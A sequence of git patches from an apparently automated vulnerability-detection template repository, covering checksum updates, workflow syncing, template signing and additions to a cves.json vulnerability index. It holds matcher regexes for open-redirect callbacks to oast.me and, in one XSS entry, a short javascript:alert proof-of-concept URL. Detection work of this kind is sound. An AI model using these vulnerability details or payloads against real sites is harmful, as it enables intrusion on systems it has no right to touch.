http/cves/2024/CVE-2024-23692.yaml http/exposed-panels/oracle-application-server-panel.yaml http/exposed-panels/veeam-backup-manager-login.yaml +http/exposed-panels/wildix-collaboration-panel.yaml http/technologies/nperf-server-detect.yaml From 04af14fbab2fdcc62825e4f76d316bb980cb2a10 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 16:11:56 +0000 Subject: [PATCH 0141/1841] Auto Generated Templates Checksum [Tue Jun 11 16:11:56 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 943822a4f7..0b660f21d4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3237,11 +3237,12 @@ http/cves/2023/CVE-2023-6360.yaml:4dc28d57d894063fd6a67edf0e29ea2380fad9be http/cves/2023/CVE-2023-6379.yaml:9f2ebeef8f2c8d3a3fb9c0e8b49cc3c0c132082d http/cves/2023/CVE-2023-6380.yaml:f4d215b24e29caa45bee7186a98523bad5c7e231 http/cves/2023/CVE-2023-6389.yaml:1442104ed12f70cbab2bdea5effa6e4262a9b95f -http/cves/2023/CVE-2023-6505.yaml:40a19a9eb6153b83a8dc2e64b05c57219055d413 +http/cves/2023/CVE-2023-6505.yaml:84f672dbc2f01d602f46205dd57f62f15dc0e8ed http/cves/2023/CVE-2023-6553.yaml:7a54271ce0dabed297718787b829f3ddc52b256c http/cves/2023/CVE-2023-6567.yaml:36ddd59d4deab3cab1f59f9bcd8a5e8ddb07d6c0 http/cves/2023/CVE-2023-6623.yaml:00d70a24f04c9124d433cb202bbe6d5feac8db68 http/cves/2023/CVE-2023-6634.yaml:7d6b2f13c31512686f5c947bca522a303557ab7b +http/cves/2023/CVE-2023-6786.yaml:9bc967e5224f2eea39e2c48b2c11c2f4eafb1150 http/cves/2023/CVE-2023-6831.yaml:ad8d1c5d09d06e040adb1ca000940c67d637d467 http/cves/2023/CVE-2023-6875.yaml:5c19bc2790c31711d03df8e4a0aa770f203bade4 http/cves/2023/CVE-2023-6895.yaml:50fd3c56376c3c233216803d769fd1a705fc052c @@ -8641,7 +8642,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0a332e6ab0843d5471dcf38c2e95f30cdc0b34aa +templates-checksum.txt:6caabcc9ab0dc500aab6f9e0e21f3718b2c37b2c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2a6892c877b771e0a9b9112012383610ee441842 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 16:12:39 +0000 Subject: [PATCH 0142/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 39e51b2f9f..37a6d4650b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,9 +7,11 @@ on: - 'http/cves/2021/CVE-2021-38147.yaml' - 'http/cves/2023/CVE-2023-38194.yaml' - 'http/cves/2023/CVE-2023-6505.yaml' + - 'http/cves/2023/CVE-2023-6786.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' - 'http/exposed-panels/veeam-backup-manager-login.yaml' + - 'http/exposed-panels/wildix-collaboration-panel.yaml' - 'http/technologies/nperf-server-detect.yaml' workflow_dispatch: jobs: From 4cc26658670dec2861d5d9e5b838832d94bf2e2d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 16:13:35 +0000 Subject: [PATCH 0143/1841] Auto Template Signing [Tue Jun 11 16:13:35 UTC 2024] :robot: --- http/cves/2023/CVE-2023-6786.yaml | 1 + http/exposed-panels/wildix-collaboration-panel.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2023/CVE-2023-6786.yaml b/http/cves/2023/CVE-2023-6786.yaml index 9f3a4d9764..088a1553cd 100644 --- a/http/cves/2023/CVE-2023-6786.yaml +++ b/http/cves/2023/CVE-2023-6786.yaml @@ -29,3 +29,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' +# digest: 4a0a00473045022100c54d339267c2f658fd113dc4fd0acbaeaa55f4b62b90801f44b112a81c3526450220443bf6993f842ca3211aebb721c05472fee7856743f6d1b666eb06e7ad644eba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/wildix-collaboration-panel.yaml b/http/exposed-panels/wildix-collaboration-panel.yaml index 538728ea45..8def655c78 100644 --- a/http/exposed-panels/wildix-collaboration-panel.yaml +++ b/http/exposed-panels/wildix-collaboration-panel.yaml @@ -30,3 +30,4 @@ http: part: server words: - "wildix" +# digest: 4a0a004730450221008b770ce8b1c0204bf8d83f67b7e17978c2409a34402bc532f12ee266c1603b0a022065ae9163e40bb78e578a448507b1e4e63722d7d18d3dda9bf5e6d8636b62ccad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c60ca7697f97bbe2b9708f57d85cd46f27c1f3ff Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 11 Jun 2024 21:44:12 +0530 Subject: [PATCH 0144/1841] minor update --- http/cves/2024/CVE-2024-0250.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-0250.yaml b/http/cves/2024/CVE-2024-0250.yaml index 80308bfbcf..cb2a9813ca 100644 --- a/http/cves/2024/CVE-2024-0250.yaml +++ b/http/cves/2024/CVE-2024-0250.yaml @@ -2,7 +2,7 @@ id: CVE-2024-0250 info: name: Analytics Insights for Google Analytics 4 < 6.3 - Open Redirect - author: securityforeveryone.com + author: securityforeveryone severity: medium description: | The plugin is vulnerable to Open Redirect due to insufficient validation on the redirect oauth2callback.php file. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. From 2137a3742212894c38133fe8c2926e0fd71f987f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 16:16:28 +0000 Subject: [PATCH 0145/1841] Auto Generated New Template Addition List [Tue Jun 11 16:16:27 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b662f9c16d..9e69654eb4 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cves/2021/CVE-2021-38146.yaml http/cves/2021/CVE-2021-38147.yaml http/cves/2023/CVE-2023-38194.yaml +http/cves/2023/CVE-2023-43472.yaml http/cves/2023/CVE-2023-6505.yaml http/cves/2023/CVE-2023-6786.yaml http/cves/2024/CVE-2024-23692.yaml From b8ffce5c8662c03d4a4a22c7ab8f05a8dbad54e6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 16:16:35 +0000 Subject: [PATCH 0146/1841] Auto Generated Templates Checksum [Tue Jun 11 16:16:35 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0b660f21d4..1f6d193731 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3172,6 +3172,7 @@ http/cves/2023/CVE-2023-43261.yaml:4c534b1a5dd5916c25664920de4051ffa1310bf1 http/cves/2023/CVE-2023-43325.yaml:cad3358ef79bdf761c1bbb77c839e9af325f506f http/cves/2023/CVE-2023-43326.yaml:f117aa600d3815d4394d93563495b9a183a6b76d http/cves/2023/CVE-2023-43374.yaml:f65d0fd722479f51ef71a6ea57cdba8cc2e9b4a9 +http/cves/2023/CVE-2023-43472.yaml:1bc8a97e7f1016f17698b7d447526963b51ecc8c http/cves/2023/CVE-2023-43795.yaml:36d3e9de4b3f54d3976afca31c54f6bf5f288b53 http/cves/2023/CVE-2023-4415.yaml:17cc5b909d851380cf62dcece5db812a7e1ea68a http/cves/2023/CVE-2023-44352.yaml:aab520d12d287288efc9c45a67a0e196a444ff93 @@ -3242,7 +3243,7 @@ http/cves/2023/CVE-2023-6553.yaml:7a54271ce0dabed297718787b829f3ddc52b256c http/cves/2023/CVE-2023-6567.yaml:36ddd59d4deab3cab1f59f9bcd8a5e8ddb07d6c0 http/cves/2023/CVE-2023-6623.yaml:00d70a24f04c9124d433cb202bbe6d5feac8db68 http/cves/2023/CVE-2023-6634.yaml:7d6b2f13c31512686f5c947bca522a303557ab7b -http/cves/2023/CVE-2023-6786.yaml:9bc967e5224f2eea39e2c48b2c11c2f4eafb1150 +http/cves/2023/CVE-2023-6786.yaml:6cb37423babfd031e76f3b1d59b8f231c968f2af http/cves/2023/CVE-2023-6831.yaml:ad8d1c5d09d06e040adb1ca000940c67d637d467 http/cves/2023/CVE-2023-6875.yaml:5c19bc2790c31711d03df8e4a0aa770f203bade4 http/cves/2023/CVE-2023-6895.yaml:50fd3c56376c3c233216803d769fd1a705fc052c @@ -4577,7 +4578,7 @@ http/exposed-panels/webtransfer-client-panel.yaml:b1054dd275106994578f41a42c2f5e http/exposed-panels/webuzo-admin-panel.yaml:79771243fa08571a0cef9c0102bc4891b3d61f77 http/exposed-panels/weiphp-panel.yaml:3e5f27cdb4868c216dfa5f7a321e68777cc710a9 http/exposed-panels/whm-login-detect.yaml:2023f5c1f8aa4ddfc9aff536684167141ae4fa4e -http/exposed-panels/wildix-collaboration-panel.yaml:0047480205d033d0c35b7e1714b4315febe157c2 +http/exposed-panels/wildix-collaboration-panel.yaml:744bf52ac175d05ea62c3eae1cea788e5a4f26f9 http/exposed-panels/wiren-board-webui.yaml:3d3ad4063b875c1ad154d84ff5bfce3b490cbd40 http/exposed-panels/wmw-enterprise-panel.yaml:4e63e7afc9132ea9ed6204b751bb56c5df4a9f0c http/exposed-panels/woodwing-panel.yaml:d942acdcb220526e73ff3c3ec78289807bd0e1f1 @@ -8642,7 +8643,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6caabcc9ab0dc500aab6f9e0e21f3718b2c37b2c +templates-checksum.txt:760ee78feee557e104034d561fba11789dcfb0ea wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4d6cdb74eec940ef196bef0edbc5fe9bfbfd7d37 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 16:17:22 +0000 Subject: [PATCH 0147/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 37a6d4650b..3922cd2262 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2021/CVE-2021-38146.yaml' - 'http/cves/2021/CVE-2021-38147.yaml' - 'http/cves/2023/CVE-2023-38194.yaml' + - 'http/cves/2023/CVE-2023-43472.yaml' - 'http/cves/2023/CVE-2023-6505.yaml' - 'http/cves/2023/CVE-2023-6786.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' From 6422d74c2135db4851a034dba9a8c78bc9547cf9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 16:17:29 +0000 Subject: [PATCH 0148/1841] Auto Generated Templates Checksum [Tue Jun 11 16:17:29 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1f6d193731..4b3b53731a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3255,6 +3255,7 @@ http/cves/2024/CVE-2024-0195.yaml:091e10588a00fadab2e1e67d7ce5f8d286e7d3d2 http/cves/2024/CVE-2024-0200.yaml:aaa2f2a6703a042cdff54922d03d08e7f649a3ad http/cves/2024/CVE-2024-0204.yaml:a5dd990f0b300285f5d71eb7300852fc580c358a http/cves/2024/CVE-2024-0235.yaml:662cd334f1c4420211126b256e502026c87670f2 +http/cves/2024/CVE-2024-0250.yaml:f35ece76d458046b1454babf9d325e837cc52048 http/cves/2024/CVE-2024-0305.yaml:066fc036c2ea567923f4983ccfcc447009354020 http/cves/2024/CVE-2024-0337.yaml:4a573bdaf757a5eca3d9892d080c0ccc038119d7 http/cves/2024/CVE-2024-0352.yaml:f2f46e8a92d48c008e17233656b4941b3fc4c874 @@ -8643,7 +8644,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:760ee78feee557e104034d561fba11789dcfb0ea +templates-checksum.txt:a94b75e60a3a2a2ca32a25b0841b1f88b7783db8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 023d5dd9421c6057c5eb59dd769dbd0e96d01de5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 16:18:25 +0000 Subject: [PATCH 0149/1841] Auto Template Signing [Tue Jun 11 16:18:25 UTC 2024] :robot: --- http/cves/2023/CVE-2023-43472.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-43472.yaml b/http/cves/2023/CVE-2023-43472.yaml index 68eeab74b9..b4193e2ff8 100644 --- a/http/cves/2023/CVE-2023-43472.yaml +++ b/http/cves/2023/CVE-2023-43472.yaml @@ -40,3 +40,4 @@ http: - 'contains(header, "application/json")' - 'status_code == 200' condition: and +# digest: 490a0046304402200604a134f8c6077c7051b019211d1b92cdae8f79ac5b9be070e6c09a53bf039102207d6375965069071d12932be5b11b6762e2396f54e8cc8ce2a051da395a28499e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From dffda6521fd10ef08941baf7aedf0fd5c9cdc36c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 16:22:48 +0000 Subject: [PATCH 0150/1841] Auto Template Signing [Tue Jun 11 16:22:48 UTC 2024] :robot: --- http/cves/2024/CVE-2024-0250.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-0250.yaml b/http/cves/2024/CVE-2024-0250.yaml index cb2a9813ca..c0fc49e587 100644 --- a/http/cves/2024/CVE-2024-0250.yaml +++ b/http/cves/2024/CVE-2024-0250.yaml @@ -32,3 +32,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' +# digest: 4a0a004730450220508ba6949e0997c93c3e04a75108bac0d84fd29cdf91842239f76d788c8d60f9022100bb118773932c0732f921c1e1dca30fa00cf7826b60410268e292e051434a276a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5ff86d8411097cccd4bd5db6b73d7c0802fa40b1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 16:24:07 +0000 Subject: [PATCH 0151/1841] Auto Generated cves.json [Tue Jun 11 16:24:07 UTC 2024] :robot: --- cves.json | 13 +++++++++++-- cves.json-checksum.txt | 2 +- 2 files changed, 12 insertions(+), 3 deletions(-) diff --git a/cves.json b/cves.json index 027b2bde54..dc2254fad5 100644 --- a/cves.json +++ b/cves.json @@ -1372,6 +1372,8 @@ {"ID":"CVE-2021-37589","Info":{"Name":"Virtua Software Cobranca \u003c12R - Blind SQL Injection","Severity":"high","Description":"Virtua Cobranca before 12R allows blind SQL injection on the login page.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37589.yaml"} {"ID":"CVE-2021-37704","Info":{"Name":"phpfastcache - phpinfo Resource Exposure","Severity":"medium","Description":"phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2021/CVE-2021-37704.yaml"} {"ID":"CVE-2021-37833","Info":{"Name":"Hotel Druid 3.0.2 - Cross-Site Scripting","Severity":"medium","Description":"Hotel Druid 3.0.2 contains a cross-site scripting vulnerability in multiple pages which allows for arbitrary execution of JavaScript commands.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37833.yaml"} +{"ID":"CVE-2021-38146","Info":{"Name":"Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download","Severity":"high","Description":"The File Download API in Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON field in /home/download POST data.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-38146.yaml"} +{"ID":"CVE-2021-38147","Info":{"Name":"Wipro Holmes Orchestrator 20.4.1 - Information Disclosure","Severity":"high","Description":"Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-38147.yaml"} {"ID":"CVE-2021-38314","Info":{"Name":"WordPress Redux Framework \u003c=4.2.11 - Information Disclosure","Severity":"medium","Description":"WordPress Redux Framework plugin through 4.2.11 is susceptible to information disclosure. The plugin registers several unique AJAX actions available to unauthenticated users in the includes function in redux-core/class-redux-core.php. These are predictable, given that they are based on an md5 hash of the site URL with a known salt value of -redux and an md5 hash of the previous hash with a known salt value of -support. An attacker can potentially employ these AJAX actions to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of the site's AUTH_KEY concatenated with the SECURE_AUTH_KEY.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-38314.yaml"} {"ID":"CVE-2021-38540","Info":{"Name":"Apache Airflow - Unauthenticated Variable Import","Severity":"critical","Description":"Apache Airflow Airflow \u003e=2.0.0 and \u003c2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-38540.yaml"} {"ID":"CVE-2021-38647","Info":{"Name":"Microsoft Open Management Infrastructure - Remote Code Execution","Severity":"critical","Description":"Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD).","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-38647.yaml"} @@ -1789,7 +1791,6 @@ {"ID":"CVE-2022-31846","Info":{"Name":"WAVLINK WN535 G3 - Information Disclosure","Severity":"high","Description":"WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in the live_mfg.shtml page. An attacker can obtain sensitive router information via the exec cmd function and possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-31846.yaml"} {"ID":"CVE-2022-31847","Info":{"Name":"WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure","Severity":"high","Description":"WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-31847.yaml"} {"ID":"CVE-2022-31854","Info":{"Name":"Codoforum 5.1 - Arbitrary File Upload","Severity":"high","Description":"Codoforum 5.1 contains an arbitrary file upload vulnerability via the logo change option in the admin panel. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code. As a result, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31854.yaml"} -{"ID":"CVE-2022-31879","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-31879.yaml"} {"ID":"CVE-2022-31974","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports\u0026date=.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31974.yaml"} {"ID":"CVE-2022-31975","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=user/manage_user\u0026id=.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31975.yaml"} {"ID":"CVE-2022-31976","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"critical","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-31976.yaml"} @@ -2181,6 +2182,7 @@ {"ID":"CVE-2023-35078","Info":{"Name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35078.yaml"} {"ID":"CVE-2023-35082","Info":{"Name":"MobileIron Core - Remote Unauthenticated API Access","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35082.yaml"} {"ID":"CVE-2023-35158","Info":{"Name":"XWiki - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: \u003e /xwiki/bin/view/XWiki/Main?xpage=restore\u0026showBatch=true\u0026xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35158.yaml"} +{"ID":"CVE-2023-35162","Info":{"Name":"XWiki \u003c 14.10.5 - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is vulnerable to reflected XSS via the previewactions template. An attacker can inject JavaScript through the xcontinue parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35162.yaml"} {"ID":"CVE-2023-35813","Info":{"Name":"Sitecore - Remote Code Execution","Severity":"critical","Description":"Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35813.yaml"} {"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"} {"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"} @@ -2208,6 +2210,7 @@ {"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"} {"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"} {"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"} +{"ID":"CVE-2023-38194","Info":{"Name":"SuperWebMailer - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in SuperWebMailer 9.00.0.01710 that allows keepalive.php XSS via a GET parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38194.yaml"} {"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion - Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"} {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"} {"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"} @@ -2271,6 +2274,7 @@ {"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"} {"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"} {"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"} +{"ID":"CVE-2023-43472","Info":{"Name":"MLFlow \u003c 2.8.1 - Sensitive Information Disclosure","Severity":"high","Description":"An issue in MLFlow versions 2.8.1 and before allows a remote attacker to obtain sensitive information via a crafted request to REST 